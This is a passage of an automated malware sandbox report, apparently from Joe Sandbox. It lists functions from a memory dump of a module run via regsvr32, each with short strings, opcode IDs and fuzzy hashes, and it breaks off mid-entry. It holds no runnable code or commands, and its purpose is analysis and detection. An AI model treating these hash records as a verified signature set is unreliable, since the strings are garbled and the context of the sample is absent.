                                                                                                                      • Opcode Fuzzy Hash: 3734db1e1fa76b1deb8c37b08e7554336876f5d77f929da89127bd52957ad7dc
                                                                                                                      • Instruction Fuzzy Hash: AC319C71218B44DBE7A9DF24C49A66BBBE1FB84384FA0591CF89286360CB30D844CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018002275C Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: fU$?G?
                                                                                                                      • API String ID: 0-3688660089
                                                                                                                      • Opcode ID: 8f188cdc42b724603917f636c2cd8a8d161c5f5019d22714e46c8456acd325da
                                                                                                                      • Instruction ID: 80650a0567581ba2c2b52a435e4591f75e49c46faa49eb55dc82b80356106ee2
                                                                                                                      • Opcode Fuzzy Hash: 8f188cdc42b724603917f636c2cd8a8d161c5f5019d22714e46c8456acd325da
                                                                                                                      • Instruction Fuzzy Hash: 4841D2B490034E8FCB48DF64D88A5DE7FF0FB68398F204619E815A6210D7B4D6A4CBD5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180023FF4 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Z/$l`[
                                                                                                                      • API String ID: 0-385504739
                                                                                                                      • Opcode ID: 96b79094790b96d101aacec5acd1f279d05d7619810021c792a55c273ff4149e
                                                                                                                      • Instruction ID: 9323c780996b8fb8d500f23f2d46433da964d56aa2b69a22ef78b2d38eb40b27
                                                                                                                      • Opcode Fuzzy Hash: 96b79094790b96d101aacec5acd1f279d05d7619810021c792a55c273ff4149e
                                                                                                                      • Instruction Fuzzy Hash: 3841A2B180434E8BCB48DF68C98A5DE7FF0FB58358F114619F859A6250D3B89694CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800021F4 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,v{$rG
                                                                                                                      • API String ID: 0-3254089575
                                                                                                                      • Opcode ID: 4478888d7a39aec4676c2f4194cda652c86ba7a28cab07bd365c66e68f3f47aa
                                                                                                                      • Instruction ID: a6b1a1d3199b417cc404c55e5dd1eb01a5f88ce71c8baedbe53c483da450d24d
                                                                                                                      • Opcode Fuzzy Hash: 4478888d7a39aec4676c2f4194cda652c86ba7a28cab07bd365c66e68f3f47aa
                                                                                                                      • Instruction Fuzzy Hash: BB41AFB090038E8FDF48CF68C88A5DE7BB0FB58348F114A19E865A6250D7B4D665CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800256A0 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <^$U
                                                                                                                      • API String ID: 0-3696377120
                                                                                                                      • Opcode ID: a39b1a8b9aa605c3d86dfe665907cc892806ea6a36a69ac2f18635df1d6b1402
                                                                                                                      • Instruction ID: e696d95e6ab2b410912a7bedf9d02d0f38519112f1f6bc965b4f6326cc0e0651
                                                                                                                      • Opcode Fuzzy Hash: a39b1a8b9aa605c3d86dfe665907cc892806ea6a36a69ac2f18635df1d6b1402
                                                                                                                      • Instruction Fuzzy Hash: 8C3192B06187818B874CDF28C55652ABBE1FBCC308F545B2DF4CAA63A0D338D601CB4A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180004118 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A&$u{
                                                                                                                      • API String ID: 0-1677111592
                                                                                                                      • Opcode ID: a0a3cf7e6962740fa14f6d176574c1a8c53e848f20a7d03528203b9b6192cc65
                                                                                                                      • Instruction ID: bf25f73c2140e7f503faede3eb1d12245a5b50dc524bf60877b1f6528db041e5
                                                                                                                      • Opcode Fuzzy Hash: a0a3cf7e6962740fa14f6d176574c1a8c53e848f20a7d03528203b9b6192cc65
                                                                                                                      • Instruction Fuzzy Hash: 2B31B6B190434E8FDF48DF68D84A5DE3BF0FB58358F004619E869A6250D3B8D664CBD5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180001D74 Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Z$3d
                                                                                                                      • API String ID: 0-441683287
                                                                                                                      • Opcode ID: a821f7888bdb1d0ca56d2609269a474882ff489041936d722eecafd79d9eccc8
                                                                                                                      • Instruction ID: 894aa7aeded1cf0c47b578ab44e8e3808b502d3498fadbcad3e996152b127daf
                                                                                                                      • Opcode Fuzzy Hash: a821f7888bdb1d0ca56d2609269a474882ff489041936d722eecafd79d9eccc8
                                                                                                                      • Instruction Fuzzy Hash: 9F31A2B191034E8FCB48CF64D5866CE7FF0FB18398F615619F859A6220D37096A4CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180020C8C Relevance: 2.6, Strings: 2, Instructions: 70COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ]S$tr
                                                                                                                      • API String ID: 0-635187309
                                                                                                                      • Opcode ID: 57074e57011b55c39ad93d5777d69e23ea94d41bc9deeb016e85ea98d1300dc1
                                                                                                                      • Instruction ID: aa873a07998187213442e9ee74ff36b06a254a2b96cc3890df0285d3550ddec4
                                                                                                                      • Opcode Fuzzy Hash: 57074e57011b55c39ad93d5777d69e23ea94d41bc9deeb016e85ea98d1300dc1
                                                                                                                      • Instruction Fuzzy Hash: 45319371569385ABC388DF28C48A81EBBE1FBC9308F806A1DF8C69A250D7759445CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001D544 Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $',.$Q
                                                                                                                      • API String ID: 0-1443989584
                                                                                                                      • Opcode ID: ad9c88e22ad3d823b850a3a299538f7846a727bc85cf8501cf0f95ecbdd1fc8a
                                                                                                                      • Instruction ID: df138cc2b08e372bfad779fe82dcfbb9a0b8e378e59a4e7d4551623b9726a53a
                                                                                                                      • Opcode Fuzzy Hash: ad9c88e22ad3d823b850a3a299538f7846a727bc85cf8501cf0f95ecbdd1fc8a
                                                                                                                      • Instruction Fuzzy Hash: 0731B0B081078E9FDB49CF65D88A5CE7BF0FB18758F104A19FC69A6210D3B49668CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180011D30 Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 3FJ/$ZZ
                                                                                                                      • API String ID: 0-3277493576
                                                                                                                      • Opcode ID: 5d88d6d3b7520e1804a52e0c7b35c5f205cf44b28ce63282b14f42cac733b6c3
                                                                                                                      • Instruction ID: 311fd2de7ec090dba4a1009b1d0c161c4d4bee75f404523d402b7db5c8f85772
                                                                                                                      • Opcode Fuzzy Hash: 5d88d6d3b7520e1804a52e0c7b35c5f205cf44b28ce63282b14f42cac733b6c3
                                                                                                                      • Instruction Fuzzy Hash: B6318D745187848BC769DFA8C48984BFBF1FB96388F500A0CF68186660D7F5D889CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180002EB0 Relevance: 2.6, Strings: 2, Instructions: 59COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ^o$eoT
                                                                                                                      • API String ID: 0-3112795925
                                                                                                                      • Opcode ID: cf0a802fd5eb7a7a9f674cbe824f5b9cf21b0c0d4e40e037fad3e58b9b3c7516
                                                                                                                      • Instruction ID: 64542a0b199d1092939ac97feba9bfdb1f68517fca85a607133902b133d56c09
                                                                                                                      • Opcode Fuzzy Hash: cf0a802fd5eb7a7a9f674cbe824f5b9cf21b0c0d4e40e037fad3e58b9b3c7516
                                                                                                                      • Instruction Fuzzy Hash: 4A3179B4528781AFC788DF28D09981BBBF0FB89304FC06A2DF8968B254D371D449CB02
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180017E50 Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 9ka8$X(<
                                                                                                                      • API String ID: 0-455423444
                                                                                                                      • Opcode ID: 9109840ee124d6567ee6c21cd6b70d321db5ae1db73f12f86acb22afcf4f2219
                                                                                                                      • Instruction ID: fb39a1ee18f27589520dc377fdda27f99ff556d13fde812dcf8a397f5c639900
                                                                                                                      • Opcode Fuzzy Hash: 9109840ee124d6567ee6c21cd6b70d321db5ae1db73f12f86acb22afcf4f2219
                                                                                                                      • Instruction Fuzzy Hash: 2F214C756183808B9749DF28C48A51BBBE0BBCD348F800B1DF4CEAA260D379D655CB4B
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180003CE4 Relevance: 2.5, Strings: 2, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 2u$St
                                                                                                                      • API String ID: 0-594449878
                                                                                                                      • Opcode ID: c11dc1c036c9458d47ee1719281c59fa50836b6797cdc2c58c3aae3dfa9c040d
                                                                                                                      • Instruction ID: b36bed944f56aa44062ec0f977d4ee498c5d405beb4cf7f3ad363434313a38c1
                                                                                                                      • Opcode Fuzzy Hash: c11dc1c036c9458d47ee1719281c59fa50836b6797cdc2c58c3aae3dfa9c040d
                                                                                                                      • Instruction Fuzzy Hash: 1A2156B050C7848BC398DF28D08941BBBE0BB8C718F400B5DF4DEA6260D3B8D6448B4A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000FCD0 Relevance: 1.6, Strings: 1, Instructions: 309COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :Z
                                                                                                                      • API String ID: 0-405040171
                                                                                                                      • Opcode ID: 7bcd32ffb38326fb28c66ce6100505a24ecafbfaf6117a301a4d45dee812b795
                                                                                                                      • Instruction ID: 002928ab4ef23ec9070c376049f9f2a876a00f34c539a077b22a6462f3165597
                                                                                                                      • Opcode Fuzzy Hash: 7bcd32ffb38326fb28c66ce6100505a24ecafbfaf6117a301a4d45dee812b795
                                                                                                                      • Instruction Fuzzy Hash: 55E1F871E0460CAFDB59DFA8E486ADDBBF2FB48384F104119F906B7290D7B09919CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800079E0 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 9%
                                                                                                                      • API String ID: 0-3705487092
                                                                                                                      • Opcode ID: c06a4efeff927d169bde34d03edd9c599d5ecfd38bff8a8ef453c913d6d7dcc5
                                                                                                                      • Instruction ID: 034f52ded3f62641215f60cf685d8f2d94a9732ee49177c47e4d189e471a63cd
                                                                                                                      • Opcode Fuzzy Hash: c06a4efeff927d169bde34d03edd9c599d5ecfd38bff8a8ef453c913d6d7dcc5
                                                                                                                      • Instruction Fuzzy Hash: 29E1E5B0604609CFDB98DF28C4856DE3BE1FF58318F41462AFC4AA7264D774DA98CB45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800012EC Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6~W
                                                                                                                      • API String ID: 0-2393260581
                                                                                                                      • Opcode ID: e8277394562caa02b2414f2a7b78424b3544c9a566d2d3bde7ccc6ae36ace73f
                                                                                                                      • Instruction ID: 26ead3f154a6122e610c6b122a9f1d348a780d35874abfa48b122ad12952c033
                                                                                                                      • Opcode Fuzzy Hash: e8277394562caa02b2414f2a7b78424b3544c9a566d2d3bde7ccc6ae36ace73f
                                                                                                                      • Instruction Fuzzy Hash: A3C156B590634DCFCB48DF68D29A99D7BF1FF59348F004129FC0A9A250E7B49528CB48
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800031A8 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &
                                                                                                                      • API String ID: 0-2131812987
                                                                                                                      • Opcode ID: 09d3b03a8a252069e3b2d4f902ab4c27f10bc1e4e165ee879a8e780ef1927062
                                                                                                                      • Instruction ID: a7efdfd69dd5e5f3b1d408db4146beb7d9ed0063ef6bb91e38be87a0176c4c06
                                                                                                                      • Opcode Fuzzy Hash: 09d3b03a8a252069e3b2d4f902ab4c27f10bc1e4e165ee879a8e780ef1927062
                                                                                                                      • Instruction Fuzzy Hash: E161117061464C8BDB6ADF38C4966AD3BE4FB88744F20603DFC6687262DB70D90ACB40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001D678 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: VQ
                                                                                                                      • API String ID: 0-118804977
                                                                                                                      • Opcode ID: 653594ffc7f88ef5626428f674d04a9dbad752d1c97a072dcb8a5a75aa8ab2ee
                                                                                                                      • Instruction ID: c02f25af4ac3ae9d2fc11aefa89a319858796e62df19045302eab2e9561bed90
                                                                                                                      • Opcode Fuzzy Hash: 653594ffc7f88ef5626428f674d04a9dbad752d1c97a072dcb8a5a75aa8ab2ee
                                                                                                                      • Instruction Fuzzy Hash: B1610C70E0470CAFDB58DF98E486ADDBBF2FB58344F00411AF945A7291DBB49918CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180020050 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: d]d
                                                                                                                      • API String ID: 0-4116004022
                                                                                                                      • Opcode ID: 905b1d080fb0dbaa216e1986528c8110b893d62f1250474fb926c1505916ea8a
                                                                                                                      • Instruction ID: af4c7f9178f1c8c7000383165ad6d151e6c60af4afa0f330b7e41b8333e144e7
                                                                                                                      • Opcode Fuzzy Hash: 905b1d080fb0dbaa216e1986528c8110b893d62f1250474fb926c1505916ea8a
                                                                                                                      • Instruction Fuzzy Hash: BD71F9705183888BEBF9CF24DC897DA37A6FB44744F20951CE94E8A261DB749689CB06
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800049D8 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: h;
                                                                                                                      • API String ID: 0-4162755607
                                                                                                                      • Opcode ID: 53094ae538c2643e8dc3844a4571612b4bb4d8faf28b8692737f65aae932dcb4
                                                                                                                      • Instruction ID: 5cdc67410e0f6a36593d41b49488665502c679f567fd69e76a00565b13158d0b
                                                                                                                      • Opcode Fuzzy Hash: 53094ae538c2643e8dc3844a4571612b4bb4d8faf28b8692737f65aae932dcb4
                                                                                                                      • Instruction Fuzzy Hash: 3E71F6B550078E8FCB48DF28C8865DA3BB1FB58388F114618FC659B264C7B4D665CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180016EC0 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: c<#
                                                                                                                      • API String ID: 0-1682220262
                                                                                                                      • Opcode ID: 52bd374a2b354d353fecde9dd3035b82ea62f237e0aa4f6a0359a109373b1125
                                                                                                                      • Instruction ID: 6987c6c4700ab83e3c99d7a61ebac7ae1f609be206526201d991b6563cf637dd
                                                                                                                      • Opcode Fuzzy Hash: 52bd374a2b354d353fecde9dd3035b82ea62f237e0aa4f6a0359a109373b1125
                                                                                                                      • Instruction Fuzzy Hash: 6451497050064C8BCB49DF24C4856DD3FE1FB4C3A8F296618FC5AAA251D770D589CB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180014C0C Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: VRs
                                                                                                                      • API String ID: 0-3606156352
                                                                                                                      • Opcode ID: e42a707fbdfb0f6f3bd7c2fd660a5f71d733ed4248ec881df27ec406b101936e
                                                                                                                      • Instruction ID: 820294f65fbfa48131e45635eb760f31cc9843818a4c484c941aad7455469745
                                                                                                                      • Opcode Fuzzy Hash: e42a707fbdfb0f6f3bd7c2fd660a5f71d733ed4248ec881df27ec406b101936e
                                                                                                                      • Instruction Fuzzy Hash: D261017150478C9FDBBACF24C89A7DA7BA0FB49304F508619E94E8E250DFB45748DB41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180021C80 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 9A
                                                                                                                      • API String ID: 0-2059232346
                                                                                                                      • Opcode ID: c1ffac81aa91fe154607957f3964f1ad965dcb11373648bbf80c87a98dea4103
                                                                                                                      • Instruction ID: b64df3069ed14da1047e9dfc21a7159aa0c7cb7bd9e3f5c7ec12f959f7554da6
                                                                                                                      • Opcode Fuzzy Hash: c1ffac81aa91fe154607957f3964f1ad965dcb11373648bbf80c87a98dea4103
                                                                                                                      • Instruction Fuzzy Hash: 1C5191B580078E8FDB48CF68D88A5DE7BB0FB08758F004A19FC65A6250D7B4DA65CF84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800248E8 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Bz
                                                                                                                      • API String ID: 0-1169448096
                                                                                                                      • Opcode ID: 9421df6c864b4def4c3104b02791c7d879680d480ac1898bc9d20b2a2dc17055
                                                                                                                      • Instruction ID: 6f5429e0cd3045fc126cfbda42227addfbd3a632f6d629ba4555b3d62782e21e
                                                                                                                      • Opcode Fuzzy Hash: 9421df6c864b4def4c3104b02791c7d879680d480ac1898bc9d20b2a2dc17055
                                                                                                                      • Instruction Fuzzy Hash: FF510971510AC8CBDBBADF68CC8D7DA3BA1FB88306F504219DC4A9E750DB74A649CB41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000E880 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;e
                                                                                                                      • API String ID: 0-3848007283
                                                                                                                      • Opcode ID: 02e43d3828cefbd400d551488936443231685348ed3748660de7de50ec1437aa
                                                                                                                      • Instruction ID: 897df1389f6a2652e7fe9f7e9b14f51424cb0c352e50e988a9e989ca55cd1f00
                                                                                                                      • Opcode Fuzzy Hash: 02e43d3828cefbd400d551488936443231685348ed3748660de7de50ec1437aa
                                                                                                                      • Instruction Fuzzy Hash: 5951067080034C8BCF49DFA5C88A5DEBFB1FB48398F11865CE85AA7210C7B49648CF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180008470 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
